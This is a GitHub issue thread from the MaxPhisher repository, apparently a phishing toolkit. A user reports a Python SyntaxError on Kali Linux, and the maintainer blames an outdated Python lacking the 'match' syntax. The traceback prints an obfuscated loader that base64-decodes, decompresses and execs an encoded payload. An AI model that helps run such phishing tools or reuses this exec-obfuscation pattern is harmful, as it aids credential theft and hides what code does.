### ISSUE TITLE
SyntaxError: invalid syntax

### ISSUE THREAD

**Issue by Lorenz11x** [KasRoudra/MaxPhisher#1]
Hello Boss, I tested Maxphishing and in termux works well, it does not only capture images, the problem is in kali linux, where it reports this error: 
-[~/Desktop/MaxPhisher] └─$ python3 maxphisher.py

-[~/Desktop/MaxPhisher]
└─$                          
    python3 maxphisher.py

[+] Please wait!
Traceback (most recent call last):
  File "maxphisher.py", line 866, in <module>
    _ = lambda __ : __import__("\x7a\x6c\x69\x62").decompress(__import__("\x62\x61\x73\x65\x36\x34").b64decode(__[::-1]));exec((_)(b'=I0ZwmyA//73Pb/dPCNP5lrwW0suKt9+uHNmBSgY4jGa9WIFBJqgzIVpivBNKHtcIk29qf33DcP5EVuAT3tXxuIVgGtENy27K4KfM5z1QeuvmiqweYN/5xqbORxAnIzS6sOvAL8EoEl9qPGvzAxgdiR0cU95EM7gaRxFNSEpCJxL8GDcHPhP8SkXx/7iraBdJEYYyZXRSYb8JyLH1foUYkJ6RDaxPsC33ThuNIm3xDz31ozVPp6v1oDN76OfE5jPDfj++cvsPzl97ijIfYntIhNy2Lox9RHVKtVUIGnW9GKwkLXUB45yFIfkDW/jrrlmLnsiyXsTD1lHJTr1J2afgk3J5ZU7yW8tcJKcJJBFZaO7PWM/hxOMtBTVuNt9RJlp7MsNpieFFOq1iTioWjtWMIkjs1C4epRaJtw4I3qd/yjtjw5fUd4EQkd9WL2pLzKSIDvLzngXQOqOYaPZvHkb0wfkMP8n/cfoJ1xK9gt6P6qUiQ+WoALYUdEqHZZ2MWTcN6u7dBMZ6klMmBeS6agq8mZ3SHG63qzvf8ab4Y0w0U0n16QZ5wNaUglMdbGI9xs5To79s5Ps3Co6USfHG0LnsyDrDTqS+tUeq1ATxaXRPEVc9uWy4j6nnW0HBydykjGJ8WnuND53PyFpbXepc/d3qGOw60MVpcoK4W9PEuvdCtkLWR6t/EjiqFSzdxFdeSwmEdMC7EtbbGWy556eo4g8ilMs8TfrW0PGpBg9LnPcbdROoq/Ukgwm2Cpt8Ak2HzolaBhKr9RKcd3l5ROzvkvcsItN9tV3Bc4ySEL8SBzMzd5M+yU5i7S4kH87pSixE18jKgGcW3ad/9cg8i4IpdMPRPHfH4t6j9ZzfJGFIU2TyI+02oz5kVLpYyMaLQ5cxKTBmndblzsNBrV+B95bzUftfewUhW3koBe/+q3pKYK8mwZX71wv7RcBGO4FICvcJOcNl/DpfaEKlJbYy2cxjrWQt5Tink1G7jPd4/1eQTUw4Qk4bWYXhw0nxhNGrGO/f9DzTPIHfXK2DV/GI8BwyoK10PJ0S1tH1ZEj3AhelI8F5J29Z1vngkipmktXgxPJwkzsKDX4oXKVr5TFz+JQ7/hT220E9QDkzJQ3Xc+Gbsaa81TOqUa98aenUv3tTnMOI9AJhMXSUQSxOFrxhix2H3j2PGxisZKd4E3SKIKQsj4Kvyq1rhPNbgBMxj7GUT7dAA0WRv8YpI9432YfpA9UMfqJp7TBcz1XCds3KKrn/s0TQO5w/PBVE+k0mPg9ZhE/lgdKjxFJ3NsCdXf09AjqsL3Cy04rTyM/7V23YCm7tmqRw5/3pViC0fg1XAs8WGNx3elRvmjD4HvzOfvYsrds0bY+iwco0T1lPt0rYwbHfVyGddje/yhceYuVNViknHTAEmLpQipERgKrTu4125rn1IbPMvFFMGV8QQLfpr5OmRRVUp5xkbzOuz3nT5rVzjHK+cCgpvWMpGgIQIZZwjHVqjlGzX+2w/Nf0bQOav1+oz2dlBla7oHan2x6KWmg3Kmcl4T050AJu+V0VQC6OqaRGnJUJe8ZQoEMeWKMh7WtofU7c4pTWc+3b+SA0R7rEB2VibXj4xh2YNaHdduhZNjKpXfIgdwkQrtGXv5XacazG0zHJcvdS+hHCbLrsbA6qyiEBIwQ83h9nRC+Gofo7a5fWJ9GrlPX50D0cxuvxa/Mf7Rh62aQLUCC1AWrhxDRSjNvqyYf77htWFfhFculBjIgB33r7Izci8rDoumA+iccx0nrO3jI1M6jj/XxBaldsThxjZSJvk608Y96d71fVC2uIucWAwT0jfc8HDCpDGf+/9J+f++75zv/LNjsav7qgy1nnuzuFODZQcCBgvYMvJwQCzyX87MPAg1qSUUVNwJe'))
  File "<string>", line 1, in <module>
  File "<string>", line 1, in <module>
  File "<string>", line 1, in <module>
  File "<string>", line 107
    match name:
             ^
SyntaxError: invalid syntax
                                

why ????? 

Thanks !!!

**Comment by KasRoudra** [comment]
@Lorenz11x Termux always serves latest packages and so your python is up to date. I think you python version of kali is outdated. Old python doesn't have match syntax. Upgrade it to latest 3.10.7 and then run again
